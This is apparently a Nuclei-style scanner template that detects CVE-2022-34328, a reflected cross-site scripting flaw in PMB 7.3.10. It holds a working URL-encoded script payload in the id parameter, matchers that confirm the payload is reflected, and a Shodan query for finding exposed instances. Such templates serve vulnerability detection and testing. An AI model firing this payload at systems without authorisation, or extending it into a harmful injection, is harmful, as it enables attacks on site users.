43 lines
1.1 KiB
YAML
43 lines
1.1 KiB
YAML
id: CVE-2022-34328
|
|
|
|
info:
|
|
name: PMB 7.3.10 - Cross-Site Scripting
|
|
author: edoardottt
|
|
severity: medium
|
|
description: |
|
|
PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.
|
|
reference:
|
|
- https://github.com/jenaye/PMB/blob/main/README.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-34328
|
|
- https://github.com/jenaye/PMB
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-34328
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
shodan-query: http.html:"PMB Group"
|
|
verified: "true"
|
|
tags: cve,cve2022,pmb,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.domain)</script>' target='cart_info"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|